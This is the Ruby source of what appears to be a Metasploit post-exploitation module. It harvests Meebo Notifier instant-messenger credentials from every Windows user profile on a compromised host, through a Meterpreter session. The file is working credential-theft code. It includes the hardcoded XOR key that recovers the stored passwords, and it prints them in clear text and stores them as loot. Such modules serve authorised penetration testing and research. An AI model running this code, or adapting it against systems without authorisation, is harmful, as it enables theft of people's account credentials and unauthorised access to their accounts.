rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/meebo.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
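class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  # Numeric protocol ids used in MeeboAccounts.txt, mapped to display names.
  # An id that is not listed here is reported as the raw number.
  PROTOCOL_NAMES = {
    0 => 'Meebo',
    1 => 'AIM',
    2 => 'Yahoo IM',
    3 => 'Windows Live',
    4 => 'Google Talk',
    5 => 'ICQ',
    6 => 'Jabber',
    7 => 'Myspace IM'
  }.freeze

  # Matches one account record: capture 1 is the hex-encoded stored password,
  # capture 2 the single-digit protocol id, capture 3 the username.
  ACCOUNT_PATTERN = /"password.{5}(.*)",\s*"protocol.{4}(\d),\s*"username.{5}(.*)"/

  # Fixed byte sequence the stored password is XORed with. Because the
  # sequence is a constant, the on-disk value is obfuscated rather than
  # encrypted: read access to the file is enough to recover the password.
  XOR_KEY = [
    4, 240, 122, 53, 65, 19, 163, 124, 109,
    73, 187, 3, 34, 93, 15, 138, 11, 153, 148, 147, 146,
    222, 129, 160, 199, 104, 240, 43, 89, 105, 204, 236,
    253, 168, 96, 48, 158, 143, 173, 60, 215, 104, 112,
    149, 15, 114, 107, 4, 92, 149, 48, 177, 42, 133, 124,
    152, 63, 137, 2, 40, 84, 131
  ].freeze

  # Registers the module metadata (name, description, authors, supported
  # platform/session types and the Meterpreter commands it relies on).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Meebo Password Extractor',
        'Description' => %q{
          This module extracts login account password stored by
          Meebo Notifier, a desktop version of Meebo's Online Messenger.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_stat
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Walks every user profile returned by grab_user_profiles and hands each
  # existing <AppData>\Meebo\MeeboAccounts.txt to parse_txt.
  def run
    grab_user_profiles.each do |user|
      app_data = user['AppData']
      next if app_data.nil?

      accounts = app_data + '\\Meebo\\MeeboAccounts.txt'

      # stat raises when the file is absent; treat any failure as "not present"
      # and move on to the next profile.
      stat = begin
        session.fs.file.stat(accounts)
      rescue StandardError
        nil
      end
      next if stat.nil?

      parse_txt(accounts)
    end
  end

  # Reads one MeeboAccounts.txt, recovers the stored account and saves it as
  # CSV loot. Only the first record matched by ACCOUNT_PATTERN is processed.
  # Any StandardError is reported with print_error instead of propagating.
  #
  # @param file [String] path of the accounts file on the session host
  # @return [void]
  def parse_txt(file)
    creds = Rex::Text::Table.new(
      'Header' => 'Meebo Instant Messenger Credentials',
      'Indent' => 1,
      'Columns' => ['User', 'Password', 'Protocol']
    )

    # Close the handle on every path: the original closed it only after a
    # successful match, so a parse failure or an exception left it open.
    config = client.fs.file.new(file, 'r')
    contents = begin
      config.read
    ensure
      config.close
    end

    record = ACCOUNT_PATTERN.match(contents.to_s)
    unless record
      print_error('Could not extract credentials from file')
      return
    end

    epass = record[1]
    username = record[3]
    protocol_id = record[2].to_i
    protocol = PROTOCOL_NAMES.fetch(protocol_id, protocol_id)

    passwd = decrypt(epass)

    # Checked before anything is printed or recorded.
    # NOTE(review): both captures are `(.*)`, so neither is nil after a
    # successful match; an empty-string check may be what was intended - confirm.
    if passwd.nil? || username.nil?
      print_status('Meebo credentials have not been found')
      return
    end

    # The recovered password is written to the console here and to the loot
    # store below, so console logs and loot files hold it in clear text.
    print_good("*** Protocol: #{protocol} User: #{username} Password: #{passwd} ***")
    creds << [username, passwd, protocol]

    print_status('Storing data...')
    path = store_loot(
      'meebo.user.creds',
      'text/csv',
      session,
      creds.to_csv,
      'meebo_user_creds.csv',
      'Meebo Notifier User Credentials'
    )

    print_good("Meebo Notifier user credentials saved in: #{path}")
  rescue StandardError => e
    print_error("An error has occurred: #{e}")
  end

  # Decodes a stored password: hex-decodes it and XORs each byte with the
  # byte at the same position in XOR_KEY.
  #
  # @param epass [String] hex-encoded value taken from the accounts file
  # @return [String] the decoded bytes
  # @raise [ArgumentError] if the decoded value is longer than XOR_KEY; the
  #   original ran past the end of the key and failed with an opaque
  #   nil-coercion TypeError instead
  def decrypt(epass)
    stored = [epass].pack('H*').unpack('C*')

    if stored.length > XOR_KEY.length
      raise ArgumentError,
            "Stored password is #{stored.length} bytes but the key covers only #{XOR_KEY.length}"
    end

    stored.each_with_index.map { |byte, idx| byte ^ XOR_KEY[idx] }.pack('C*')
  end
end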